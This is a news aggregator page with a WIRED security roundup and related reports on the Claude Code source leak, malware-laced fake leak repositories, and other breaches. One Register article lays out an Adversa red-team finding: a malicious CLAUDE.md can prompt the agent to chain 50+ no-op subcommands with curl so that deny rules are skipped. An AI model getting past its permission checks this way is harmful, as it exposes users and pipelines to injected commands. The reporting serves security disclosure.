Andy Greenberg Dell Cameron Maddy Varner Andrew Couts
Security
Apr 4, 2026 6:30 AM
Security News This Week: Hackers Are Posting the Claude Code Leak With Bonus Malware
Plus: The FBI says a recent hack of its wiretap tools poses a national security risk, attackers stole Cisco source code as part of an ongoing supply chain hacking spree, and more.
Photo-Illustration: WIRED Staff; Getty Images
Save this story
Save this story
A WIRED investigation based on Department of Homeland Security records this week revealed the identities of paramilitary Border Patrol agents who frequently used force against civilians during Operation Midway Blitz in Chicago last fall. Several of the agents, WIRED found, appeared in similar operations in other states around the US.
Customs and Border Protection may want to remember to protect its sensitive facility information. Using basic Google searches, WIRED discovered flashcards made by users of the online learning platform Quizlet that contained gate codes to CBP facilities and more.
In a rare move, Apple this week released “backported” patches for iOS 18 to protect millions of people still using the older operating system from the DarkSword hacking technique that was found in use in the wild. Discovered in March, DarkSword allows attackers to infect iPhones that simply visit a website loaded with the takeover tools embedded in it. Apple initially pushed users to update to the current version of its operating system, iOS 26, but ultimately issued the iOS 18 patches after DarkSword continued to spread.
The US-Israel war with Iran careened into its second month this week, with Iran threatening to launch attacks against more than a dozen US companies , including tech giants like Apple, Google, and Microsoft, which have offices and data centers in the Gulf region. The deadly conflict, which has no clear end in sight, continues to wreak havoc on the global economy as shipping crews remain stranded in the Strait of Hormuz , a key trade route. Meanwhile, some are beginning to wonder what could happen if US strikes cause real damage to Iran’s nuclear facilities .
And that’s not all! Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.
Hackers Are Posting the Claude Code Leak With Bonus Malware
Earlier this week, a security researcher flagged that Anthropic accidentally made the source code for its popular vibe-coding tool, Claude Code, public. Immediately, people began reposting the code on the developer platform GitHub. But beware if you want to try to download some of those repos yourself: BleepingComputer reports that some of the posters are actually hackers who have tucked a piece of infostealer malware into the lines of code.
Anthropic, for its part, has been trying to remove copies of the leak (malware-ridden or not) by issuing copyright takedown notices. The Wall Street Journal reported that the company initially tried to remove more than 8,000 repositories on GitHub but later narrowed that down to 96 copies and adaptations.
This isn't the first time that hackers have capitalized on interest in Claude Code, which requires users who might not be as familiar with their computer's terminal to copy and paste install commands from a website. In March, 404 Media reported that sponsored ads on Google led to sites that were masquerading as official Claude Code installation guides, which directed users to run a command that would actually download malware.
Hack of FBI Wiretap Tools Are Officially a National Security Risk
The FBI formally classified a recent cyber intrusion into one of its surveillance collection systems as a “major incident” under FISMA —a legal designation reserved for breaches believed to pose serious risks to national security. The determination, reported to Congress earlier this week , is understood to be the first time since at least 2020 that the bureau has declared a major incident on its own systems. Politico, citing two unnamed senior Trump administration officials, reported that China is believed to be behind the intrusion. If confirmed, the breach could mark a significant counterintelligence failure for the FBI.
The FBI said it detected “suspicious activities” on its networks in February . In a notice to Congress on March 4, reviewed by Politico, the bureau said the compromised systems were unclassified and held “returns from legal process,” citing, as examples, phone and internet metadata collected under court orders and personal information “pertaining to subjects of FBI investigations.” The intruders reportedly gained access through a commercial internet service provider, an approach the FBI characterized as reflecting “sophisticated tactics.” In its only public statement, the bureau said it had deployed “all technical capabilities to respond.”
The breach adds to what has become a pattern of hackers, most if not all foreign, penetrating the FBI's own systems and surveillance infrastructure. In 2023, a foreign hacker accessed files from the bureau's Epstein investigation through an exposed forensic lab server. Last month, Iranian-linked hackers compromised FBI Director Kash Patel's personal email . The Salt Typhoon campaign , uncovered in 2024, saw Chinese hackers burrow into at least eight domestic telecom and internet service providers—exploiting the carrier side of the same surveillance infrastructure believed to be at issue in the current breach. The FBI acknowledged last year that Salt Typhoon had compromised at least 200 companies across 80 countries, and researchers said it showed no signs of slowing down.
How a 22-Year-Old College Student Helped Take Down a Record-Breaking Botnet
Two weeks ago, US law enforcement announced a landmark takedown of four interrelated botnets—massive collections of computers hijacked with malware to do a hacker’s bidding—that were known by the names Aisuru, Kimwolf, JackSkid, and Mossad. The Aisuru and Kimwolf botnets in particular had carried out some of the biggest so-called distributed denial-of-service cyberattacks in history, using hordes of hacked internet-of-things devices to bombard victims with junk traffic.
Now The Wall Street Journal has published a detailed look at an unlikely player in the investigation of those botnets, 22-year-old Benjamin Brundage, a student at the Rochester Institute of Technology. Brundage obsessively tracked the Kimwolf botnet, which he would learn had infected home networks around the world via devices that act as “residential proxies,” essentially offering backdoors into those networks. Brundage went so far as to lurk on Discord and chat with people he suspected had insider information on the hacking campaign, learning key technical clues that he shared with law enforcement. Along with Brundage’s story, the Journal also offered a helpful guide to help determine whether your home network is vulnerable via residential proxy devices and how to protect yourself.
$280 Million Stolen From Drift Crypto Platform, Likely by North Korean Hackers
Given the rate at which the cryptocurrency industry’s insecurity has funded the authoritarian regime of Kim Jong Un in recent years, 2026 was overdue for a large-scale North Korean crypto theft. Now, the decentralized finance platform Drift has conceded that $280 million was stolen from the company in a cybersecurity breach. Crypto-tracing firm Elliptic pointed the finger at North Korean hackers for the intrusion based on clues in their interactions with the blockchains of the stolen crypto as well as their “laundering methodologies and network-level indicators.” In total, Elliptic says that North Korean hackers have stolen close to $300 million this year, the vast majority of which was taken in this latest theft. As huge as that heist may be, the country’s hackers still aren’t quite on track to beat the $2 billion in crypto they stole in total last year.
Cisco Source Code Stolen in Software Supply Chain Breach Spree
Cybersecurity news outlet Bleeping Computer reported this week that Cisco had been the latest victim of a software supply chain hacking spree, which has now resulted in the theft of portions of the company’s source code and that of some of its customers. The breach appears to be the work of the TeamPCP hacker group, which has compromised multiple pieces of security software with its own malicious code, then used their access from that malware to steal user credentials. In this case, Cisco’s credentials were reportedly stolen via the compromise of the vulnerability scanner software Trivy, which then allowed the hackers to access Cisco’s developer environments. The Cisco breach is just the most recent in a string of supply chain attacks that TeamPCP has carried out to spread its infostealer malware, including via the LiteLLM AI software and the security software CheckMarx.
|
|
|
Anthropic took down thousands of GitHub repos trying to yank its leaked source code — a move the company says was an accident | TechCrunch |
techcrunch |
01.04.2026 22:12 |
0.747
|
| Embedding sim. | 0.8486 |
| Entity overlap | 0.375 |
| Title sim. | 0.2174 |
| Time proximity | 0.8264 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | software development |
| NLP страна | United States |
Открыть оригинал
Anthropic accidentally caused thousands of code repositories on GitHub to be taken down while trying to pull copies of its most popular product’s source code off the internet.
On Tuesday, a software engineer discovered that Anthropic had, seemingly by accident, included access to the source code for the category-leading Claude Code command line application in a recent release. AI enthusiasts pored over the leaked code for clues about how Anthropic harnesses the LLM that underlies the application, sharing it on GitHub.
Anthropic issued a takedown notice under U.S. digital copyright law asking GitHub to take down repositories containing the offending code. According to GitHub’s records , the notice was executed against some 8,100 repositories — including legitimate forks of Anthropic’s own publicly released Claude Code repository, according to irate social media users whose code got blocked.
Anthropic’s head of Claude Code, Boris Cherny, said the move was accidental and retracted the bulk of the takedown notices, limiting it to one repository and 96 forks with the accidentally released source code.
“The repo named in the notice was part of a fork network connected to our own public Claude Code repo, so the takedown reached more repositories than intended,” an Anthropic spokesperson told TechCrunch. “We retracted the notice for everything except the one repo we named, and GitHub has restored access to the affected forks.”
The botched clean-up here is another black eye for the company as it reportedly plans an IPO, a task which typically demands attention to execution and compliance. Leaking your source code as a public company? You better believe there’s a shareholder lawsuit coming.
Topics
AI , Anthropic , GitHub , In Brief
April 30
San Francisco, CA
StrictlyVC kicks off the year in SF. Get in the room for unfiltered fireside chats with industry leaders, insider VC insights, and high-value connections that actually move the needle. Tickets are limited.
REGISTER NOW
Newsletters
See More
Subscribe for the industry’s biggest tech news
TechCrunch Daily News
Every weekday and Sunday, you can get the best of TechCrunch’s coverage.
TechCrunch Mobility
TechCrunch Mobility is your destination for transportation news and insight.
Startups Weekly
Startups are the core of TechCrunch, so get our best coverage delivered weekly.
StrictlyVC
Provides movers and shakers with the info they need to start their day.
No newsletters selected.
Subscribe
By submitting your email, you agree to our Terms and Privacy Notice .
Related
AI
Cognichip wants AI to design the chips that power AI, and just raised $60M to try
Tim Fernholz
1 day ago
AI
Anthropic is having a month
Connie Loizos
2 days ago
Startups
Yupp shuts down after raising $33M from a16z crypto’s Chris Dixon
Julie Bort
2 days ago
Latest in AI
AI
OpenAI acquires TBPN, the buzzy founder-led business talk show
Rebecca Bellan
26 minutes ago
AI
Microsoft takes on AI rivals with three new foundational models
Rebecca Szkutak
3 hours ago
Apps
Google now lets you direct avatars through prompts in its Vids app
Ivan Mehta
4 hours ago
X
LinkedIn
Facebook
Instagram
youTube
Mastodon
Threads
Bluesky
TechCrunch
Staff
Contact Us
Advertise
Crunchboard Jobs
Site Map
Terms of Service
Privacy Policy
RSS Terms of Use
Code of Conduct
Kalshi
Copilot
Blue Origin
WordPress
Bezos
Tech Layoffs
ChatGPT
© 2026 TechCrunch Media LLC.
|
|
|
Anthropic accidentally exposes Claude Code source code |
the_register_ai |
31.03.2026 17:02 |
0.737
|
| Embedding sim. | 0.8382 |
| Entity overlap | 0.2143 |
| Title sim. | 0.1563 |
| Time proximity | 0.9819 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | code generation |
| NLP страна | |
Открыть оригинал
AI + ML
13
Anthropic goes nude, exposes Claude Code source by accident
13
Oopsy-doodle: Did someone forget to check their build pipeline?
Brandon Vigliarolo
Tue 31 Mar 2026 //
17:02 UTC
Would you like a closer look at Claude? Someone at Anthropic has some explaining to do, as the official npm package for Claude Code shipped with a map file exposing what appears to be the popular AI coding tool's entire source code.
It did as of Tuesday morning, at least, which is when security researcher Chaofan Shou appears to have spotted the exposure and told the world . Snapshots of Claude Code's source code were quickly backed up in a GitHub repository that has been forked more than 41,500 times so far, disseminating it to the masses and ensuring that Anthropic's mistake remains the AI and cybersecurity community’s gain.
According to the GitHub upload of the exposed Claude Code source, the leak actually resulted from a reference to an unobfuscated TypeScript source in the map file included in Claude Code's npm package (map files are used to connect bundled code back to the original source). That reference, in turn, pointed to a zip archive hosted on Anthropic's Cloudflare R2 storage bucket that Shou and others were able to download and decompress to their hearts' content.
Contained in the zip archive is a wealth of info: some 1,900 TypeScript files consisting of more than 512,000 lines of code, full libraries of slash commands and built-in tools - the works, in short.
That said, Claude Code's source isn't a complete mystery, and while this exposure gives us a look at a fresh iteration of Claude Code straight from the leaky bucket, it's not blowing the lid off of something that was a secret until now.
Claude Code has been reverse engineered , and various projects have resulted in an entire website dedicated to exposing the hidden portions of Claude Code that haven't been released to, or shared with, the public.
In other words, what we have is a useful comparison point and update source for the CCLeaks operators, and maybe a few new secrets will come to light as people dig through the exposed code.
Far more interesting is the fact that someone at Anthropic made a mistake as bad as leaving a map file in a publish configuration. Publishing map files is generally frowned upon, as they're meant for debugging obfuscated or bundled code and aren't necessary for production. Not only that, but as we've seen in this example, they can easily be used to expose source code, as they're a reference document for that original.
Anthropic admits Claude Code users hitting usage limits 'way faster than expected'
Infosec community panics as Anthropic rolls out Claude code security checker
Anthropic sues US government after unprecedented national security designation
Anthropic struggling with Chinese competition, its own safety obsession
As pointed out by software engineer Gabriel Anhaia in a deep dive into the exposed code, this should serve as a reminder to even the best developers to check their build pipelines.
"A single misconfigured .npmignore or files field in package.json can expose everything," Anhaia wrote in his analysis of the Claude Code leak.
Anthropic admitted as much in a statement to The Register , saying that, yes, it was good ol' human error responsible for this snafu.
"Earlier today, a Claude Code release included some internal source code," an Anthropic spokesperson told us in an email, adding that no customer data or credentials were involved or exposed. "This was a release packaging issue caused by human error, not a security breach. We're rolling out measures to prevent this from happening again."
As of this writing, the original uploader of the Claude Code source to GitHub has repurposed his repo to host a Python feature port of Claude Code instead of Anthropic's directly exposed source, citing concerns that he could be held legally liable for hosting Anthropic's intellectual property. Plenty of forks and mirrors remain for those who want to inspect the exposed code.
We asked Anthropic if it was considering asking people to remove their repositories of its exposed source code, but the company didn't have anything to say beyond its statement. ®
Share
More about
AI
Anthropic
Claude
More like these
×
More about
AI
Anthropic
Claude
Developer
Narrower topics
AIOps
API
DeepSeek
Gemini
Git
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Programming Language
Retrieval Augmented Generation
Software bug
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Large Language Model
Self-driving Car
More about
Share
13
COMMENTS
More about
AI
Anthropic
Claude
More like these
×
More about
AI
Anthropic
Claude
Developer
Narrower topics
AIOps
API
DeepSeek
Gemini
Git
Google AI
GPT-3
GPT-4
Machine Learning
MCubed
Neural Networks
NLP
Programming Language
Retrieval Augmented Generation
Software bug
Star Wars
Tensor Processing Unit
TOPS
Broader topics
Large Language Model
Self-driving Car
TIP US OFF
Send us news
|
|
|
Fake Claude Code source downloads actually delivered malware |
the_register_ai |
02.04.2026 17:34 |
0.719
|
| Embedding sim. | 0.8255 |
| Entity overlap | 0.2222 |
| Title sim. | 0.2651 |
| Time proximity | 0.7112 |
| NLP тип | other |
| NLP организация | Zscaler |
| NLP тема | cybersecurity |
| NLP страна | |
Открыть оригинал
Security
1
They thought they were downloading Claude Code source. They got a nasty dose of malware instead
1
Source code with a side of Vidar stealer and GhostSocks
Jessica Lyons
Thu 2 Apr 2026 //
17:34 UTC
Tens of thousands of people eagerly downloaded the leaked Claude Code source code this week, and some of those downloads came with a side of credential-stealing malware.
A malicious GitHub repository published by idbzoomh uses the Claude Code exposure as a lure to trick people into downloading malware, including Vidar , an infostealer that snarfs account credentials, credit card data, and browser history; and GhostSocks , which is used to proxy network traffic.
Zscaler's ThreatLabz researchers came across the repo while monitoring GitHub for threats, and said it's disguised as a leaked TypeScript source code for Anthropic's Claude Code CLI.
"The README file even claims the code was exposed through a .map file in the npm package and then rebuilt into a working fork with 'unlocked' enterprise features and no message limits," the security sleuths said in a Thursday blog.
They added that the GitHub repository link appeared near the top of Google results for searches like "leaked Claude Code." While that was no longer the case at The Register 's time of publication, at least two of the developer's trojanized Claude Code source leak repos remained on GitHub, and one of them had 793 forks and 564 stars.
Anthropic goes nude, exposes Claude Code source by accident
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system
Malware-laced OpenClaw installers get Bing AI search boost
AI agents are 'gullible' and easy to turn into your minions
The malicious .7z archive in the repository's releases section is named Claude Code - Leaked Source Code, and it includes a Rust-based dropper named ClaudeCode_x64.exe.
Once it's executed, the malware drops Vidar v18.7 and GhostSocks onto users' machines, and then the Vidar stealer gets to work collecting sensitive data while GhostSocks turns infected devices into proxy infrastructure that criminals can use to mask their true online location and carry out additional activity through compromised computers.
In March, security shop Huntress warned about a similar malware campaign using OpenClaw , the already risky AI agent platform, as a GitHub lure to deliver the same two payloads.
Both of these illustrate how quickly criminals move to take a buzzy new product or news event (like OpenClaw and the Claude Code leak) and then abuse it for online scams and financial gain. "That kind of rapid movement increases the chance of opportunistic compromise, especially through trojanized repositories," the Zscaler team wrote.
The blog also includes a list of indicators of compromise, including the GitHub repositories with the trojanized Claude Code leak and malware hashes to help defenders in their threat-hunting efforts, so be sure to check that out - and, as always, be careful what you download. ®
Share
More about
AI
Claude
Cybercrime
More like these
×
More about
AI
Claude
Cybercrime
Security
Zscaler
Narrower topics
2FA
Advanced persistent threat
AIOps
Application Delivery Controller
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Digital certificate
Encryption
End Point Protection
Exploit
Firewall
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Hacker
Hacking
Hacktivism
Identity Theft
Incident response
Infosec
Infrastructure Security
Kenna Security
Large Language Model
Machine Learning
MCubed
NCSAM
NCSC
Neural Networks
NLP
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
REvil
RSA Conference
Software Bill of Materials
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
TLS
TOPS
Trojan
Trusted Platform Module
Vulnerability
Wannacry
Zero trust
Broader topics
Anthropic
Self-driving Car
More about
Share
1
COMMENTS
More about
AI
Claude
Cybercrime
More like these
×
More about
AI
Claude
Cybercrime
Security
Zscaler
Narrower topics
2FA
Advanced persistent threat
AIOps
Application Delivery Controller
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Digital certificate
Encryption
End Point Protection
Exploit
Firewall
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Hacker
Hacking
Hacktivism
Identity Theft
Incident response
Infosec
Infrastructure Security
Kenna Security
Large Language Model
Machine Learning
MCubed
NCSAM
NCSC
Neural Networks
NLP
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
REvil
RSA Conference
Software Bill of Materials
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
TLS
TOPS
Trojan
Trusted Platform Module
Vulnerability
Wannacry
Zero trust
Broader topics
Anthropic
Self-driving Car
TIP US OFF
Send us news
|
|
|
Утечка Claude Code, Cursor 3 и конец халявы от Anthropic |
habr_ai |
07.04.2026 10:45 |
0.708
|
| Embedding sim. | 0.8116 |
| Entity overlap | 0.25 |
| Title sim. | 0.1449 |
| Time proximity | 0.8701 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | ai agents |
| NLP страна | |
Открыть оригинал
Восьмой выпуск еженедельных IT-новостей от OpenIDE.
Самая громкая неделя за всё время выпусков: Anthropic слили полные исходники своего флагманского агента, Cursor выпустил третью версию с полным переосмыслением интерфейса, а ещё Anthropic закрыли лазейку, которой пользовались все любители OpenClaw.
Читать далее
|
|
|
PocketCoder-A1: Как я заставил свой Claude работать в три смены |
habr_ai |
06.04.2026 06:00 |
0.706
|
| Embedding sim. | 0.7901 |
| Entity overlap | 0.6 |
| Title sim. | 0.1215 |
| Time proximity | 0.8591 |
| NLP тип | product_launch |
| NLP организация | |
| NLP тема | code generation |
| NLP страна | |
Открыть оригинал
ИИ не заменяет людей — люди просто больше работают. Так давайте хотя бы ночью пусть работает ИИ.
Как мы сделали Авто‑Кодера, выжимая максимум из нашей подписки на LLM!
Читать далее
|
|
|
[Перевод] Claude Code слил 512 000 строк кода. Никто не разобрался в архитектуре. Утечка показала, что это не обёртка, а ОС |
habr_ai |
06.04.2026 12:56 |
0.705
|
| Embedding sim. | 0.8554 |
| Entity overlap | 0.7143 |
| Title sim. | 0.1282 |
| Time proximity | 0.1492 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | ai agents |
| NLP страна | |
Открыть оригинал
512 000 строк утекшего кода. 44 feature-флага. Система питомцев в духе тамагочи. Имена вроде “Tengu”, “Fennec” и “Penguin mode”. Всё это – то, о чём написали сотни новостей. Но не это главное .
Пока интернет разбирал по косточкам внутренности Claude Code, увлечённо споря, игрушка это или серьёзная архитектура, настоящая ценность утечки осталась почти незамеченной. Anthropic случайно показала миру не список фич. Она показала, как на самом деле думает её ИИ-агент.
За милыми именами и игровыми механиками скрывается жёсткая инженерная реальность: самовосстанавливающийся цикл запросов, вычисления во сне и двухуровневая система отсечения функций. Это уже не обёртка над API. Это операционная система для ИИ . И сегодня мы разберём три паттерна, которые делают Claude Code не просто дорогим автокомплитом, а продуктом на 2,5 млрд $ в год.
Читать далее
|
|
|
Началось: меня забанили в Claude Code на аккаунте за $200 |
habr_ai |
10.04.2026 12:58 |
0.704
|
| Embedding sim. | 0.804 |
| Entity overlap | 0.4286 |
| Title sim. | 0.1048 |
| Time proximity | 0.838 |
| NLP тип | other |
| NLP организация | |
| NLP тема | software development |
| NLP страна | |
Открыть оригинал
Вчера мне заблокировали аккаунт в Claude Code.
Это был не расходник и не тестовый акк, это был нормальный основной аккаунт с полуторагодовалой платной историей. Максимально платный аккаунт, который уже “начал меня хорошо понимать”, и вокруг которого уже была построена софтверная фабрика и фабрика экспериментов, был без предупреждения безвозвратно отключен.
И это отличная история, чтобы глубоко порефлексировать на всю эту тему. Поговорим про хрупкость, свой харнесс, заменяемость, и немного про людей.
Читать далее
|
|
|
Claude Code bypasses safety rule if given too many commands |
the_register_ai |
01.04.2026 20:51 |
0.703
|
| Embedding sim. | 0.8073 |
| Entity overlap | 0.1667 |
| Title sim. | 0.1304 |
| Time proximity | 0.9175 |
| NLP тип | other |
| NLP организация | Adversa |
| NLP тема | ai security |
| NLP страна | Israel |
Открыть оригинал
AI + ML
10
Claude Code bypasses safety rule if given too many commands
10
A hard-coded limit on deny rules drops automatic enforcement for concatenated commands
Thomas Claburn
Wed 1 Apr 2026 //
20:51 UTC
Updated Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks.
Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.
Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.
One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~/.claude/settings.json
, you'd add something like { "deny": ["Bash(curl:*)"] }
.
But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50
. After 50, the agent falls back on asking permission from the user. The comment explains that 50 is a generous allowance for legitimate usage.
"The assumption was correct for human-authored commands," the Adversa AI Red Team said in a writeup provided ahead of publication to The Register . "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."
The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op "true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system
Don't open that WhatsApp message, Microsoft warns
Ruby Central report reopens wounds over RubyGems repo takeover
One in seven Americans are ready for an AI boss, but they might not trust it
In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents (--dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.
Ironically, Anthropic has developed a fix – a parser referred to as "tree-sitter" that's also evident in its source code and is available internally but not in public builds.
Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed.
A fix would be easy. Anthropic already has "tree-sitter" working internally and a simple one line change, switching the "behavior" key from "ask" to "deny" in the bashPermissions.ts file at line 2174, would address this particular vulnerability.
Anthropic did not immediately respond to a request for comment. ®
Updated on April 2 to add:
After this story was filed, Adversa said that the vulnerability appears to have been fixed without notice in the newly released Claude Code v2.1.90 .
Share
More about
AI
Claude
Development
More like these
×
More about
AI
Claude
Development
Security
Software
Narrower topics
2FA
Accessibility
AdBlock Plus
Advanced persistent threat
AIOps
App
Application Delivery Controller
Audacity
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Confluence
Cybercrime
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Database
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Devops
Digital certificate
Encryption
End Point Protection
Exploit
Firewall
FOSDEM
FOSS
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Grab
Graphics Interchange Format
Hacker
Hacking
Hacktivism
IDE
Identity Theft
Image compression
Incident response
Infosec
Infrastructure Security
Jenkins
Kenna Security
Large Language Model
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
NCSAM
NCSC
Neural Networks
NLP
OpenOffice
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Programming Language
QR code
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
Retro computing
REvil
RSA Conference
Search Engine
Software Bill of Materials
Software bug
Software License
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
Text Editor
TLS
TOPS
Trojan
Trusted Platform Module
User interface
Visual Studio
Visual Studio Code
Vulnerability
Wannacry
WebAssembly
Web Browser
WordPress
Zero trust
Broader topics
Anthropic
Self-driving Car
More about
Share
10
COMMENTS
More about
AI
Claude
Development
More like these
×
More about
AI
Claude
Development
Security
Software
Narrower topics
2FA
Accessibility
AdBlock Plus
Advanced persistent threat
AIOps
App
Application Delivery Controller
Audacity
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Confluence
Cybercrime
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Database
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Devops
Digital certificate
Encryption
End Point Protection
Exploit
Firewall
FOSDEM
FOSS
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Grab
Graphics Interchange Format
Hacker
Hacking
Hacktivism
IDE
Identity Theft
Image compression
Incident response
Infosec
Infrastructure Security
Jenkins
Kenna Security
Large Language Model
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
NCSAM
NCSC
Neural Networks
NLP
OpenOffice
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Programming Language
QR code
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
Retro computing
REvil
RSA Conference
Search Engine
Software Bill of Materials
Software bug
Software License
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
Text Editor
TLS
TOPS
Trojan
Trusted Platform Module
User interface
Visual Studio
Visual Studio Code
Vulnerability
Wannacry
WebAssembly
Web Browser
WordPress
Zero trust
Broader topics
Anthropic
Self-driving Car
TIP US OFF
Send us news
|
|
|
Мой фреймворк для агентной разработки с Claude Code |
habr_ai |
10.04.2026 17:11 |
0.698
|
| Embedding sim. | 0.7801 |
| Entity overlap | 0.375 |
| Title sim. | 0.1379 |
| Time proximity | 0.9749 |
| NLP тип | other |
| NLP организация | |
| NLP тема | ai agents |
| NLP страна | |
Открыть оригинал
Год назад я проникся идеей вайбкодинга и начал разбираться, как бы организовать процесс так, чтобы на выходе получалось что-то полезное.
В итоге собрал свой фреймворк агентной разработки и выложил его на Гитхаб . Это набор скиллов и команд для Claude Code, которые учат его уму-разуму.
Я не разработчик. Я учился кодить в школе и универе, но ни разу не писал код в настоящих проектах. Жизнь завела меня сначала в маркетинг, а потом в менеджмент.
Фреймворк заточен под таких же людей, как я. С техническим складом ума, но без реального опыта в настоящем программировании. Наш разработчик — это Claude Code. Он же devops, он же специалист по безопасности, он же технический писатель.
Человеку отводится роль продакта — придумывать, что делать, говорить, как оно должно себя вести в разных сценариях и edge cases, ставить задачи, понимать потребности пользователей. Ну и тестировать все это в конце, чтобы убедиться, что все работает так, как задумано.
Читать далее
|
|
|
Anthropic temporarily banned OpenClaw's creator from accessing Claude | TechCrunch |
techcrunch |
10.04.2026 20:27 |
0.696
|
| Embedding sim. | 0.8274 |
| Entity overlap | 0.2917 |
| Title sim. | 0.2212 |
| Time proximity | 0.4236 |
| NLP тип | other |
| NLP организация | Anthropic |
| NLP тема | ai agents |
| NLP страна | United States |
Открыть оригинал
“Yeah folks, it’s gonna be harder in the future to ensure OpenClaw still works with Anthropic models,” OpenClaw creator Peter Steinberger posted on X early Friday morning , along with a photo of a message from Anthropic saying his account had been suspended over “suspicious” activity.
The ban didn’t last long. A few hours later, after the post went viral, Steinberger said his account had been reinstated. Among hundreds of comments — many of them in conspiracy theory land, given that Steinberger is now employed by Anthropic rival OpenAI — was one by an Anthropic engineer. The engineer told the famed developer that Anthropic has never banned anyone for using OpenClaw and offered to help.
Yeah folks, it's gonna be harder in the future to ensure OpenClaw still works with Anthropic models. pic.twitter.com/U6F8GZvPcH
— Peter Steinberger 🦞 (@steipete) April 10, 2026
It’s not clear if that was the key that restored the account. (We’ve asked Anthropic about it.) But the whole message string was enlightening on many levels.
To recap the recent history: This ban followed news last week that subscriptions to Anthropic’s Claude would no longer cover “third-party harnesses including OpenClaw,” the AI model company said.
OpenClaw users now have to pay for that usage separately, based on consumption, through Claude’s API. In essence, Anthropic, which offers its own agent, Cowork, is now charging a “claw tax.” Steinberger said he was following this new rule and using his API but was banned anyway.
Anthropic said it instituted the pricing change because subscriptions weren’t built to handle the “usage patterns” of claws. Claws can be more compute-intensive than prompts or simple scripts because they may run continuous reasoning loops, automatically repeat or retry tasks, and tie into a lot of other third-party tools.
Steinberger, however, wasn’t buying that excuse. After Anthropic changed the pricing, he posted , “Funny how timings match up, first they copy some popular features into their closed harness, then they lock out open source.” Though he didn’t specify, he may have been referring to features added to Claude’s Cowork agent, such as Claude Dispatch, which lets users remotely control agents and assign tasks . Dispatch rolled out a couple of weeks before Anthropic changed its OpenClaw pricing policy.
Steinberger’s frustration with Anthropic was again on display Friday.
One person implied that some of this is on him for taking a job at OpenAI instead of Anthropic, posting, “You had the choice, but you went to the wrong one.” To which Steinberger replied: “One welcomed me, one sent legal threats.”
Ouch .
When multiple people asked him why he’s using Claude instead of his employer’s models at all, he explained that he only uses it for testing, to ensure updates to OpenClaw won’t break things for Claude users.
He explained: “You need to separate two things. My work at the OpenClaw Foundation where we wanna make OpenClaw work great for *any* model provider, and my job at OpenAI to help them with future product strategy.”
Multiple people also pointed out that the need to test Claude is because that model remains a popular choice for OpenClaw users over ChatGPT. He also heard that when Anthropic changed its pricing, to which he replied: “Working on that.” (So, that’s a clue about what his job at OpenAI entails.)
Steinberger did not respond to a request for comment.
Topics
